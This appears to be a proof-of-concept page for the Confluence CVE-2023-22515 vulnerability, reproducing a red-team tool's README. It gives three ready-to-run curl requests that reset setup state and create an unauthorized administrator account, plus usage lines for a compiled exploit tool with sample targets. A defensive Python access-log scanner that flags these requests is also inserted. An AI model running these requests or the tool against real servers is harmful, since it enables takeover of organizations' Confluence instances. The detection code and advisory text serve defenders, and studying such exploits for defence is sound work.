CVE-2023-22515 PoC: Atlassian Confluence Server security vulnerability

Associated Vulnerability
Title: Atlassian Confluence Server security vulnerability (CVE-2023-22515)
Description: Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
Description
Exploitation tool for the Confluence unauthorized administrator user creation vulnerability (CVE-2023-22515)
Readme
# Red team tool: exploitation tool for the Confluence unauthorized administrator user creation vulnerability (CVE-2023-22515)

## Affected versions
```
8.0.0 <= Confluence Data Center and Confluence Server <= 8.0.4
8.1.0 <= Confluence Data Center and Confluence Server <= 8.1.4
8.2.0 <= Confluence Data Center and Confluence Server <= 8.2.3
8.3.0 <= Confluence Data Center and Confluence Server <= 8.3.2
8.4.0 <= Confluence Data Center and Confluence Server <= 8.4.2
8.5.0 <= Confluence Data Center and Confluence Server <= 8.5.1
```

## Exploitation

### 1. Normal access reports that installation is already complete
```
curl -vk http://IP/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false
```

### 2. Create an administrator user
```
test123 Password2
```
Run the following command:
```
curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=test123&fullName=test123&email=test123@localhost&password=Password2&confirm=Password2&setup-next-button=Next" http://IP/setup/setupadministrator.action
```

### 3. Setup complete
```
curl -vk -X POST -H "X-Atlassian-Token: no-check" http://IP/setup/finishsetup.action
```
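
From the defender's side, the three requests above leave a recognizable trail in the web access log. The following is an added example, not code from this repository: it scans access-log lines for the `bootstrapStatusProvider` parameter and for `/setup/*.action` requests, grouped per client. The log layout, the `classify`/`scan` names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in an assumed layout (client, time, request, status);
# adapt LINE_RE to the access-log format your proxy or Tomcat actually writes.
SAMPLE_LOG = """\
203.0.113.7 [16/Oct/2023:10:14:01 +0000] "GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1" 200
203.0.113.7 [16/Oct/2023:10:14:02 +0000] "POST /setup/setupadministrator.action HTTP/1.1" 200
203.0.113.7 [16/Oct/2023:10:14:03 +0000] "POST /setup/finishsetup.action HTTP/1.1" 200
198.51.100.9 [16/Oct/2023:10:20:00 +0000] "GET /server-info.action HTTP/1.1" 200
198.51.100.9 [16/Oct/2023:10:21:00 +0000] "GET /setup/setupadministrator.action HTTP/1.1" 403
192.0.2.44 [16/Oct/2023:11:00:00 +0000] "GET /login.action?os_destination=%2Fsetup HTTP/1.1" 200
"""
LINE_RE = re.compile(r'^(\S+) \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(target):
    """Return the indicator a request target matches, or None."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()  # normalise encoding and case
    keys = [k.lower() for k, _ in parse_qsl(parts.query, keep_blank_values=True)]
    if any(k.startswith("bootstrapstatusprovider.") for k in keys):
        return "setup-state-override"
    if "/setup/" in path and path.endswith(".action"):  # tolerates a context path
        return "setup-endpoint"
    return None

def scan(log_text):
    """Map each client with hits to 'high' or 'review'."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        kind = classify(m.group(4)) if m else None
        if kind:
            hits[m.group(1)].append((kind, int(m.group(5))))
    report = {}
    for ip, events in hits.items():
        kinds = {k for k, _ in events}
        served = any(k == "setup-endpoint" and s < 400 for k, s in events)
        # Override plus a served setup request is the sequence the page describes.
        report[ip] = "high" if len(kinds) == 2 and served else "review"
    return report

if __name__ == "__main__":
    for ip, level in sorted(scan(SAMPLE_LOG).items()):
        print(ip, level)
```

A "high" result on an instance that finished setup long ago warrants checking the administrator group for accounts nobody recognizes.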

## Usage

```
cve-2023-22515.exe
Usage of cve-2023-22515.exe:
  -pass string
        指定要添加的密码
  -proxy string
        设置代理
  -u string
        指定目标
  -user string
        指定要添加的用户名
```

### Random username and password
```
cve-2023-22515.exe -u http://10.108.3.117:8090
```
![image-2023101116485852](images/Snipaste_2023-10-16_10-14-22.png)

### Manually add an administrator user
```
cve-2023-22515.exe -u http://10.108.3.117:8090 -user tesxe17 -pass Password2
```
![image-20231011164858593](images/image-20231011164858593.png)


## Changelog
```
[+] 2023/10/16 Added random username and password
```


File Snapshot

```
[4.0K] /data/pocs/e1f04a866f7b4e84b14684c05aabe11c074589f0
├── [  33] go.mod
├── [4.0K] images
│   ├── [ 15K] image-20231011164412511.png
│   ├── [ 11K] image-20231011164858593.png
│   └── [9.3K] Snipaste_2023-10-16_10-14-22.png
├── [3.6K] main.go
└── [1.9K] README.md

1 directory, 6 files
```